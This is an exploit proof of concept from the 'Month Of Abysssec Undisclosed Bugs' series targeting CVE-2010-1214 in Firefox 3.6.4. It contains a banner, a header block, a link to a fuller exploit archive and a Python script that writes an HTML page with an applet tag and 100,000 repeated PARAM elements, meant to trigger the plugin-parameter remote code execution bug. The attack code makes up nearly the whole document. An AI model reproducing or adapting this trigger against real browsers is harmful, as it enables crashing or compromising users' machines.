Month Of Abysssec Undisclosed Bugs - Firefox Plugin Parameter

                							

                '''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/
http://www.exploit-db.com/sploits/moaub-17-exploit.zip
'''
'''
  Title              :  Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution
  Version            :  Firefox 3.6.4
  Analysis           :  http://www.abysssec.com
  Vendor             :  http://www.mozilla.com
  Impact             :  Critical
  Contact            :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter            :  @abysssec
  CVE                :  CVE-2010-1214
   
'''
 
import sys;
 
myStyle = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>page demonstration</title>
<link rel="stylesheet" type="text/css" href="style2.css" />
 
 
</head>
<body id='msg'>
 
 
    <applet code = 'appletComponentArch.DynamicTreeApplet'   archive = 'DynamicTreeDemo.jar', width = 300, height = 300 >
 
"""
i=0
while(i<100000):
    myStyle = myStyle + "<PARAM name='snd' value='Hello.au|Welcome.au'>\n";
    i=i+1
 
myStyle = myStyle + """
    </applet>
 
</body>
</html>
"""
cssFile = open("Abysssec.html","w")
cssFile.write(myStyle)
cssFile.close()
<p>